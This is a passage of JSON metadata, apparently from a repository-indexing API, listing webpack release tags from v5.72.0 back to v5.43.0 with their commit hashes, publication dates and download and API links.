v5.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0/manifests"},{"name":"v5.71.0","sha":"c2079f7e7666a913d6fdad4b9102ffb0d3801cc8","kind":"tag","published_at":"2022-04-01T13:41:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.71.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0/manifests"},{"name":"v5.70.0","sha":"5a26b7c4a923c42022ca97fe9cbf46907a20d6d8","kind":"tag","published_at":"2022-03-03T14:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.70.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0/manifests"},{"name":"v5.69.1","sha":"dfdc8b133d3d49371251e29efeefb9d31b982c9e","kind":"tag","published_at":"2022-02-17T13:46:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1/manifests"},{"name":"v5.69.0","sha":"9d21401151b32abcefad0ffdb3238da91e2089ef","kind":"tag","published_at":"2022-02-15T12:33:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0/manifests"},{"name":"v5.68.0","sha":"f593d98453e7920bf65f24bf051cd67b5704b59d","kind":"tag","published_at":"2022-01-31T16:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.68.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0/manifests"},{"name":"v5.67.0","sha":"4abe329dcdaea60371c03c0d85c3a3994d875138","kind":"tag","published_at":"2022-01-21T17:44:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.67.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0/manifests"},{"name":"v5.66.0","sha":"0105bc1f005d78e3819a567ffb91432683569070","kind":"tag","published_at":"2022-01-12T08:23:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.66.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0/manifests"},{"name":"v5.65.0","sha":"323d65e2b1f6d275bf1b4a93ef753f027de78193","kind":"tag","published_at":"2021-12-06T13:57:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.65.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0/manifests"},{"name":"v5.64.4","sha":"d3cd4cb6e38338237fe722d4b7feae2244c425c5","kind":"tag","published_at":"2021-11-25T15:49:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4/manifests"},{"name":"v5.64.3","sha":"c66e4ce32027fd31935ce9197c219e46308ebd3f","kind":"tag","published_at":"2021-11-24T08:27:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3/manifests"},{"name":"v5.64.2","sha":"0065223c4ddac3bf872bc8d660ef1e9a63afa080","kind":"tag","published_at":"2021-11-20T13:43:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2/manifests"},{"name":"v5.64.1","sha":"3d5503a5b535b89bbdde78535c1839cefd88e4fa","kind":"tag","published_at":"2021-11-15T17:16:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1/manifests"},{"name":"v5.64.0","sha":"789e58514b5747f6474bc247e4e104ce22892a2c","kind":"tag","published_at":"2021-11-11T14:16:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0/manifests"},{"name":"v5.63.0","sha":"f011c70aacbd4dd3c4e518b9b9d8ea945dce0a9a","kind":"tag","published_at":"2021-11-09T19:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.63.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0/manifests"},{"name":"v5.62.2","sha":"3aed1fe0249f8730a35fab62e3cdc3b399b0b6e9","kind":"tag","published_at":"2021-11-09T11:12:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2/manifests"},{"name":"v5.62.1","sha":"daba59b3d60e7895543b6563682c209e4ad6b8b8","kind":"tag","published_at":"2021-11-05T16:26:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1/manifests"},{"name":"v5.62.0","sha":"04640dcc757c8b3e78c6cbf6e4dda7cbbde33fe2","kind":"tag","published_at":"2021-11-05T14:56:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0/manifests"},{"name":"v5.61.0","sha":"0306510f7d1b9b13900f1dcf78a767c2ed390a61","kind":"tag","published_at":"2021-10-29T14:00:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.61.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0/manifests"},{"name":"v5.60.0","sha":"f0298fe46fc22eebf42eb034a9435d7c19aeddd9","kind":"tag","published_at":"2021-10-25T16:20:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.60.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0/manifests"},{"name":"v5.59.1","sha":"3dbbdcb28cce3860247f06a18e48f536ab266834","kind":"tag","published_at":"2021-10-20T21:39:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1/manifests"},{"name":"v5.59.0","sha":"19ca23f062544263f48d2947da0ecfb29ae0bb36","kind":"tag","published_at":"2021-10-19T17:54:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0/manifests"},{"name":"v5.58.2","sha":"8a6d156c156282dd3d0ba001187c282402a1177f","kind":"tag","published_at":"2021-10-13T09:39:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2/manifests"},{"name":"v5.58.1","sha":"2eecffb2739d13d3095568d118ffc0baacec5cd8","kind":"tag","published_at":"2021-10-08T13:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1/manifests"},{"name":"v5.58.0","sha":"7666277551be32947227e80fb2fccdbbe656254b","kind":"tag","published_at":"2021-10-07T15:48:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0/manifests"},{"name":"v5.57.1","sha":"0581bb3c1c32bcb3e182a0f732b862a6c5bb7846","kind":"tag","published_at":"2021-10-05T18:25:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1/manifests"},{"name":"v5.57.0","sha":"e841ab01417f8e1dd6a2533638f848b5ad0c7d16","kind":"tag","published_at":"2021-10-05T15:06:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0/manifests"},{"name":"v5.56.1","sha":"ed55e200efb0dad7716d509c82a6ed82aee86c51","kind":"tag","published_at":"2021-10-04T07:32:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1/manifests"},{"name":"v5.56.0","sha":"4eb122092d9696ac5286bc2dcf3eacfb901f4fed","kind":"tag","published_at":"2021-10-01T14:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0/manifests"},{"name":"v5.55.1","sha":"e78403d6a8d4e682fbd4a0eb58f042866cfde42a","kind":"tag","published_at":"2021-09-29T08:56:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1/manifests"},{"name":"v5.55.0","sha":"5db30851c7ed007d8f94150ee2c6a1b47d10d388","kind":"tag","published_at":"2021-09-28T17:39:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0/manifests"},{"name":"v5.54.0","sha":"45829826701ff6582ea16bc36376d105ff264c26","kind":"tag","published_at":"2021-09-24T19:07:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.54.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0/manifests"},{"name":"v5.53.0","sha":"6796b73a1ab83739f0e722d914676c9dd58d65e2","kind":"tag","published_at":"2021-09-16T13:52:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.53.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0/manifests"},{"name":"v5.52.1","sha":"d95a0418b64bd366f0c51f2635ef0c24158b8bce","kind":"tag","published_at":"2021-09-10T08:55:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1/manifests"},{"name":"v5.52.0","sha":"4edd3800567f279edd7091af14b3385552a8972f","kind":"tag","published_at":"2021-09-03T15:27:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0/manifests"},{"name":"v5.51.2","sha":"684e22ec4d6e6221de8a4a8a6b3b8f37b863a09d","kind":"tag","published_at":"2021-09-02T13:24:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2/manifests"},{"name":"v5.51.1","sha":"d3da48e7e3da3042b7142fe3deced0bcaac3e704","kind":"tag","published_at":"2021-08-19T14:16:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1/manifests"},{"name":"v5.51.0","sha":"bd7cb37f1c0d872cfff9fc27c7db52a25e1ba6a3","kind":"tag","published_at":"2021-08-19T09:04:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0/manifests"},{"name":"v5.50.0","sha":"400a0f94ab45ca20b10f219c8311e87d3d3f108c","kind":"tag","published_at":"2021-08-10T18:31:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.50.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0/manifests"},{"name":"v5.49.0","sha":"d3868384c37f9d674d1db17a0198393bd213c763","kind":"tag","published_at":"2021-08-06T11:07:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.49.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.49.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.49.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0/manifests"},{"name":"v5.48.0","sha":"67f3aef3c11e2a8d9e7dc1e0300350588ebd7aec","kind":"tag","published_at":"2021-08-02T12:36:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.48.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.48.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.48.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0/manifests"},{"name":"v5.47.1","sha":"3f353b6ae29ae6d96e0ab86e7233b4c785f99c60","kind":"tag","published_at":"2021-07-29T14:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1/manifests"},{"name":"v5.47.0","sha":"efeb1287e52870036cc01b22476852205e99c31a","kind":"tag","published_at":"2021-07-27T14:27:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0/manifests"},{"name":"v5.46.0","sha":"a32b0fd041260f3303b9329c9a65cc4afe102390","kind":"tag","published_at":"2021-07-22T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0/manifests"},{"name":"v5.45.1","sha":"7102df3bb52a33529ff5db4fdf34484d2a359a49","kind":"tag","published_at":"2021-07-16T20:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1/manifests"},{"name":"v5.45.0","sha":"db52c58a4fb037ece22be6365f56c11bc78fb426","kind":"tag","published_at":"2021-07-16T15:50:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0/manifests"},{"name":"v5.44.0","sha":"f20158d4492e73d07a36cd1614dfbd1dc1ea143d","kind":"tag","published_at":"2021-07-08T19:37:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0/manifests"},{"name":"v5.43.0","sha":"b53a06437a3e8b2756c550c1be6ccb33fdba03d7","kind":"tag","published_at":"2021-07-06T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tag